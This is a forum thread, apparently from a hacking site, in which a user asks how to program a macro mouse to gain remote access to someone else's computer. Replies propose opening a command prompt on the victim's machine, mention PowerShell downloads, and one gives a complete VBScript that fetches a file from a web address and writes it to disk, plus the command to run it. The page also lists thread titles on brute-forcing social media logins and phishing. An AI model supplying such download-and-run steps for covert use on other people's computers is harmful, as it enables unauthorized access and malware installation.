I just got a macro programmable mouse and was thinking that it could be interesting to create a macro so that when run on someone elses computer could allow remote access, or do something else of interest. Any ideas out there? It would have to be some command that could be recorded on the mouses macro. Such as opening a web browser and searching a specific url.
Forum Thread: Macro Mouse Hack
- Hot
- Active
-
Forum Thread: How to Hack a Website to Edit It 19 Replies
1 day ago -
Forum Thread: Hack Instagram Account Using BruteForce 194 Replies
2 days ago -
Forum Thread: Android Doesn't Connect Back to Metasploit with App Payload? 18 Replies
2 days ago -
Forum Thread: Hacking Facebook,Twitter,Instagram Account Passwords with BruteForce 156 Replies
3 days ago -
Forum Thread: Kali Linux WiFi Problem? 41 Replies
4 days ago -
How to: HACK Android Device with TermuX on Android | Part #1 - Over the Internet [Ultimate Guide] 173 Replies
4 days ago -
Forum Thread: How to Start Listening Connections on Metaslpoit (WINDOWS) 8 Replies
5 days ago -
Forum Thread: Grab Target's Webcam by Link 4 Replies
5 days ago -
How to: HACK Android Device with TermuX on Android | Part #2 - Over WLAN Hotspot [Ultimate Guide] 24 Replies
6 days ago -
Forum Thread: Complete Guide to Creating and Hosting a Phishing Page for Beginners 41 Replies
1 wk ago -
Forum Thread: No Wireless Extensions in Linux Debian 3 Replies
2 wks ago -
How to: Sign the APK File with Embedded Payload (The Ultimate Guide) 6 Replies
2 wks ago -
Forum Thread: Bruteforce Password Cracker (ghoster_brute) 6 Replies
2 wks ago -
Forum Thread: Txpower Adjustment? 17 Replies
2 wks ago -
Forum Thread: How to Controll Multiple Devices Using a Meterpreter ? 4 Replies
2 wks ago -
Forum Thread: Delete Infected Apk from Victim Phone Remotely 1 Replies
2 wks ago -
How to: Install Metasploit Framework on Android | Part #1 - in TermuX 81 Replies
3 wks ago -
Forum Thread: The Most Anonymous Reconnaissance Technique? 1 Replies
3 wks ago -
Forum Thread: Tp-Link wn8200nd 2 Replies
3 wks ago -
Forum Thread: How to Identify and Crack Hashes 6 Replies
3 wks ago
-
How To: Null Byte's Hacker Guide to Buying an ESP32 Camera Module That's Right for Your Project
-
How To: Perform Keystroke Injection Attacks Over Wi-Fi with Your Smartphone
-
Android for Hackers: How to Turn an Android Phone into a Hacking Device Without Root
-
How to Hack Wi-Fi: Cracking WPA2 Passwords Using the New PMKID Hashcat Attack
-
How To: Brute-Force Nearly Any Website Login with Hatch
-
How to Hack Wi-Fi: Stealing Wi-Fi Passwords with an Evil Twin Attack
-
How To: This Top-Rated Audio & Video Production Bundle Is on Sale for $40
-
How To: Get an Internet Connection in the Middle of Nowhere to Hack Remotely
-
How To: Hack Android Using Kali (Remotely)
-
How To: Buy the Best Wireless Network Adapter for Wi-Fi Hacking in 2019
-
How To: Crack Shadow Hashes After Getting Root on a Linux System
-
How to Hack Wi-Fi: Cracking WPA2-PSK Passwords Using Aircrack-Ng
-
Hack Like a Pro: How to Hack Facebook (Facebook Password Extractor)
-
How To: Scan for Vulnerabilities on Any Website Using Nikto
-
How To: Spy on Traffic from a Smartphone with Wireshark
-
How To: Gain SSH Access to Servers by Brute-Forcing Credentials
-
How To: Crack SSH Private Key Passwords with John the Ripper
-
How To: Top 10 Things to Do After Installing Kali Linux
-
How To: 4 Ways to Crack a Facebook Password & How to Protect Yourself from Them
-
How To: Hack WPA & WPA2 Wi-Fi Passwords with a Pixie-Dust Attack Using Airgeddon
4 Responses
My mouse has buttons for keystrokes and combinations, so it seems like it could be programmed to maybe open a Command Prompt, and type some commands. That'd be pretty cool.
Thats what i was thinking as well. I just don't know what kind of command would be useful to quicky run.
There seem to be some commands for PowerShell that can download pages from the internet, and I'm sure there are commands to run them.
You can write a VBScript and run it from CMD:
*' Set your settings
strFileURL = "http://example.com/download"
strHDLocation = "c:\logo.jpg"
' Fetch the file
Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP")
objXMLHTTP.open "GET", strFileURL, false
objXMLHTTP.send()
If objXMLHTTP.Status = 200 Then
Set objADOStream = CreateObject("ADODB.Stream")
objADOStream.Open
objADOStream.Type = 1 'adTypeBinary
objADOStream.Write objXMLHTTP.ResponseBody
objADOStream.Position = 0 'Set the stream position to the start
Set objFSO = Createobject("Scripting.FileSystemObject")
If objFSO.Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocation
Set objFSO = Nothing
objADOStream.SaveToFile strHDLocation
objADOStream.Close
Set objADOStream = Nothing
End if
Set objXMLHTTP = Nothing*
And to run the file from CMD - cscript.exe downloadfile.vbs
Share Your Thoughts